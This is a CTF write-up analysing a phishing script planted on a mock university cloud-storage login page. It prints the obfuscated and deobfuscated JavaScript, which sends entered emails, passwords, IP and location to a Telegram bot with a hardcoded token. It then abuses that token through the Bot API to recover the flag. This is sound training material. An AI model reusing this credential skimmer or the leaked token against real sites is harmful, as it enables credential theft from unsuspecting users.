Tags: api telegram
# Broken Bot
- 378 Points / 119 Solves
## Background
Made by FM Global
A malicious actor was able to compromise RIT's Cloud Storage web portal. Investigate and determine the scope of the compromise.
NOTE: The flag format is Flag{}
## Enumeration
**Home page:**
In here, we see there's the RIT's Cloud Storage web portal login page, and the email field has been filled for us.
**Let's view the source page:**
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/core.min.js"x></script 1=2> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.9-1/md5.js"x></script 1=2>
<script x>var _0x7298=["\x67\x65\x74\x46\x75\x6C\x6C\x59\x65\x61\x72","\x77\x72\x69\x74\x65"];document[_0x7298[1]]( new Date()[_0x7298[0]]())</script 1=2
<script src="https://zeptojs.com/zepto.min.js" x></script 1=2>
<script x>
var A=B;function B(C,D){var E=F();return B=function(Bbb,G){Bbb=Bbb-0xb7;var H=E[Bbb];return H;},B(C,D);}(function(I,J){var K=B,L=I();while(!![]){try{var M=-parseInt(K(0xe9))/0x1+-parseInt(K(0xda))/0x2+parseInt(K(0xc0))/0x3*(-parseInt(K(0xb8))/0x4)+parseInt(K(0xd6))/0x5+-parseInt(K(0xe0))/0x6*(-parseInt(K(0xd5))/0x7)+parseInt(K(0xb7))/0x8*(-parseInt(K(0xe3))/0x9)+-parseInt(K(0xe1))/0xa*(parseInt(K(0xdb))/0xb);if(M===J)break;else L['push'](L['shift']());}catch(N){L['push'](L['shift']());}}}(F,0xa9b1c));var elem=$(A(0xb9)),elem1=A(0xde),elem2=A(0xd7),email=$(A(0xc2))[A(0xc9)](),domain=email[A(0xe4)](email[A(0xbc)]('@')+0x1),frmsite=domain[A(0xe4)](0x0,domain[A(0xbc)]('.'));const str=frmsite+A(0xce),str2=str[A(0xbd)](0x0)[A(0xeb)]()+str[A(0xe7)](0x1);let today=new Date()[A(0xc6)]();$(A(0xba))[A(0xe5)](str2),$('#title')[A(0xe5)](str2),$(A(0xc1))['append'](A(0xbb)+domain+A(0xd4)),$(A(0xdd))[A(0xe5)](A(0xcd)+domain+'\x22>'),document[A(0xe8)][A(0xd0)]['background']=A(0xca)+domain+'\x27)',elem['on'](A(0xec),function(O){var P=A;$('#inputPassword')[P(0xdf)]()===''?alert(P(0xcb)):$['getJSON'](P(0xcf),function(Q){var R=P,S=Q['ip'],T=Q[R(0xc8)],U=Q['region'],V=Q['country'],W=navigator['userAgent'];let X=new Date()[R(0xc6)]();var Y=R(0xc4)+str2+'\x20by\x20Zach\x20A**'+'\x0a\x0a'+R(0xe2)+$(R(0xc2))[R(0xc9)]()+'\x0a'+R(0xc7)+$(R(0xd9))[R(0xdf)]()+'\x0a'+'IP\x20Address\x20:\x20'+S+'\x0a'+R(0xe6)+U+'\x0a'+R(0xc3)+T+'\x0a'+R(0xbe)+V+'\x0a'+R(0xed)+W+'\x0a'+R(0xcc)+$(R(0xea))[R(0xdf)]()+'\x0a'+R(0xd8)+X+'\x0a'+R(0xbf)+$(R(0xc5))[R(0xdf)](),Z=R(0xdc)+elem1+R(0xd3);$[R(0xd2)](Z,{'chat_id':elem2,'text':Y},function(AA){var AB=R;window['location'][AB(0xee)]=AB(0xd1);});});});function F(){var AC=['val','12ZidQyC','20AFlrCY','Email:\x20','63792quNVYn','substring','append','Region\x20:\x20','slice','body','139437pXYFEK','#UserEmail','toUpperCase','click','Useragent\x20:\x20','href','88GpIPQU','904cdojGd','#submit','#dname','<img\x20class=\x22mb-4\x22\x20src=\x22https://logo.clearbit.com/','lastIndexOf','charAt','Country\x20:\x20','DateSent\x20:\x20','10311YpzJVd','#dlogo','#emailtext','City\x20:\x20','***','#DateSent','toLocaleDateString','Password\x20:\x20','city','text','url(\x27https://logo.clearbit.com/','Password\x20field\x20missing!','Format\x20:\x20','<link\x20rel=\x22icon\x22\x20href=\x22https://logo.clearbit.com/','\x20Cloud\x20Storage','https://ip.seeip.org/geoip','style','https://archive.org/details/VoiceMail_173','post','/sendMessage','\x22\x20alt=\x22\x22\x20width=\x22150\x22\x20\x20>','4716964xBODFJ','3724320KAqSuZ','5852841790','Date\x20Filled\x20:\x20','#inputPassword','380874lxWkrT','1170928pBbGzs','https://api.telegram.org/bot','head','6055124896:AAFyQlC_8dr1GndB26ji4iV2ol2bPPQ9lq4'];F=function(){return AC;};return F();}
</script 1=2
Hmm... Since a malicious actor compromised the Cloud Storage web portal, ***it's clear that the bad actor did something peculiar to the `/` page.***
Like **obfuscated `<script>` element, weird `1=2`.**
Now, **don't click "Sign in" yet**, just in case the bad actor did a [watering hole attack](https://en.wikipedia.org/wiki/Watering_hole_attack) to the `/` page.
**Let's deobfuscate `<script>` elements via [de4js](https://lelinhtinh.github.io/de4js/):**
var _0x7298 = ["getFullYear", "write"];
document[_0x7298[1]](new Date()[_0x7298[0]]())
var A = B;
function B(C, D) {
var E = F();
return B = function (Bbb, G) {
Bbb = Bbb - 0xb7;
var H = E[Bbb];
return H;
}, B(C, D);
}(function (I, J) {
var K = B,
L = I();
while (!![]) {
try {
var M = -parseInt(K(0xe9)) / 0x1 + -parseInt(K(0xda)) / 0x2 + parseInt(K(0xc0)) / 0x3 * (-parseInt(K(0xb8)) / 0x4) + parseInt(K(0xd6)) / 0x5 + -parseInt(K(0xe0)) / 0x6 * (-parseInt(K(0xd5)) / 0x7) + parseInt(K(0xb7)) / 0x8 * (-parseInt(K(0xe3)) / 0x9) + -parseInt(K(0xe1)) / 0xa * (parseInt(K(0xdb)) / 0xb);
if (M === J) break;
else L['push'](L['shift']());
} catch (N) {
}(F, 0xa9b1c));
var elem = $(A(0xb9)),
elem1 = A(0xde),
elem2 = A(0xd7),
email = $(A(0xc2))[A(0xc9)](),
domain = email[A(0xe4)](email[A(0xbc)]('@') + 0x1),
frmsite = domain[A(0xe4)](0x0, domain[A(0xbc)]('.'));
const str = frmsite + A(0xce),
str2 = str[A(0xbd)](0x0)[A(0xeb)]() + str[A(0xe7)](0x1);
let today = new Date()[A(0xc6)]();
$(A(0xba))[A(0xe5)](str2), $('#title')[A(0xe5)](str2), $(A(0xc1))['append'](A(0xbb) + domain + A(0xd4)), $(A(0xdd))[A(0xe5)](A(0xcd) + domain + '\">'), document[A(0xe8)][A(0xd0)]['background'] = A(0xca) + domain + '\')', elem['on'](A(0xec), function (O) {
var P = A;
$('#inputPassword')[P(0xdf)]() === '' ? alert(P(0xcb)) : $['getJSON'](P(0xcf), function (Q) {
var R = P,
S = Q['ip'],
T = Q[R(0xc8)],
U = Q['region'],
V = Q['country'],
W = navigator['userAgent'];
let X = new Date()[R(0xc6)]();
var Y = R(0xc4) + str2 + ' by Zach A**' + '\x0a\x0a' + R(0xe2) + $(R(0xc2))[R(0xc9)]() + '\x0a' + R(0xc7) + $(R(0xd9))[R(0xdf)]() + '\x0a' + 'IP Address : ' + S + '\x0a' + R(0xe6) + U + '\x0a' + R(0xc3) + T + '\x0a' + R(0xbe) + V + '\x0a' + R(0xed) + W + '\x0a' + R(0xcc) + $(R(0xea))[R(0xdf)]() + '\x0a' + R(0xd8) + X + '\x0a' + R(0xbf) + $(R(0xc5))[R(0xdf)](),
Z = R(0xdc) + elem1 + R(0xd3);
$[R(0xd2)](Z, {
'chat_id': elem2,
'text': Y
}, function (AA) {
var AB = R;
window['location'][AB(0xee)] = AB(0xd1);
function F() {
var AC = ['val', '12ZidQyC', '20AFlrCY', 'Email: ', '63792quNVYn', 'substring', 'append', 'Region : ', 'slice', 'body', '139437pXYFEK', '#UserEmail', 'toUpperCase', 'click', 'Useragent : ', 'href', '88GpIPQU', '904cdojGd', '#submit', '#dname', '', '4716964xBODFJ', '3724320KAqSuZ', '5852841790', 'Date Filled : ', '#inputPassword', '380874lxWkrT', '1170928pBbGzs', 'https://api.telegram.org/bot', 'head', '6055124896:AAFyQlC_8dr1GndB26ji4iV2ol2bPPQ9lq4'];
F = function () {
return AC;
return F();
**The first `<script>` element is just displaying the current year:**
So we can just ignore that.
How about the second `<script>` element?
**It looks very complex to me... However function `F()` stands out to me:**
var AC = ['val', '12ZidQyC', '20AFlrCY', 'Email: ', '63792quNVYn', 'substring', 'append', 'Region : ', 'slice', 'body', '139437pXYFEK', '#UserEmail', 'toUpperCase', 'click', 'Useragent : ', 'href', '88GpIPQU', '904cdojGd', '#submit', '#dname', '', '4716964xBODFJ', '3724320KAqSuZ', '5852841790', 'Date Filled : ', '#inputPassword', '380874lxWkrT', '1170928pBbGzs', 'https://api.telegram.org/bot', 'head', '6055124896:AAFyQlC_8dr1GndB26ji4iV2ol2bPPQ9lq4'];
That weird array is interesting.
- It has an `archive.org` link: `https://archive.org/details/VoiceMail_173`
- Telegram API bot link: `https://api.telegram.org/bot`
- Grab public IP link: `https://ip.seeip.org/geoip`
Hmm... It seems like when we click "Sign in", ***it'll forward our password, IP address, `User-Agent` to the Telegram group??***
**Let's try to type some random password and send it:**
**Burp Suite HTTP history:**
As you can see, it indeed **grabbing our IP, password and other things to a Telegram API bot.**
Also, it brings us to a voice mail. However, nothing useful.
- Telegram API bot:
"ok": true,
"result": {
"message_id": 2357,
"from": {
"id": 6055124896,
"is_bot": true,
"first_name": "RIT_CTF_Telegram_Bot",
"username": "rochesterissodamncoldbot"
"chat": {
"id": 5852841790,
"first_name": "Z",
"username": "l337Hackzor",
"type": "private"
"date": 1680334511,
"text": "***Rit Cloud Storage by Zach A**\n\nEmail: [email protected]\nPassword : dafwgawg\nIP Address : [...]\nRegion : [...]\nCity : [...]\nCountry : [...]\nUseragent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36\nFormat : [email protected]\nDate Filled : 4/1/2023\nDateSent : 1/28/2023 2:55:30 p.m.",
"entities": [
"offset": 41,
"length": 17,
"type": "email"
"offset": 92,
"length": 14,
"type": "url"
"offset": 318,
"length": 17,
"type": "email"
In here, we found the **chat username is `l337Hackzor`**.
Hmm... Maybe we can do something with the API???
**According to [Telegram API documentation](https://core.telegram.org/bots/api#getchat), we can get up to date information about the chat:**
Also, all queries to the Telegram Bot API must be served over HTTPS and need to be presented in this form: `https://api.telegram.org/bot<token>/METHOD_NAME`.
Uhh nope.
The `message_auto_delete_time`'s value is `31536000`, which means message will be deleted after 1 year.
**How about the `rochesterissodamncoldbot`?**
Some weird files?
We can also download those files via `getFile` method:
└> wget https://api.telegram.org/file/bot6055124896:AAFyQlC_8dr1GndB26ji4iV2ol2bPPQ9lq4/profile_photos/file_108.jpg
└> eog file_108.jpg
Nothing weird.
**After Googling "Telegram bot API leak sensentive information", I found [this blog](https://www.wired.com/story/telegram-bots-tls-encryption/):**
However, I couldn't forward those chat messages...
**Then, I kept dig deeper to the API documentation, and I found 2 methods:**
Let's try to first one:
**Second one??**
Oh!! We found the flag!
- **Flag: `Flag{Always_Check_For_Misconfigurations}`**
## Conclusion
What we've learned:
1. Leaking Sensentive Information Via Telegram Bot API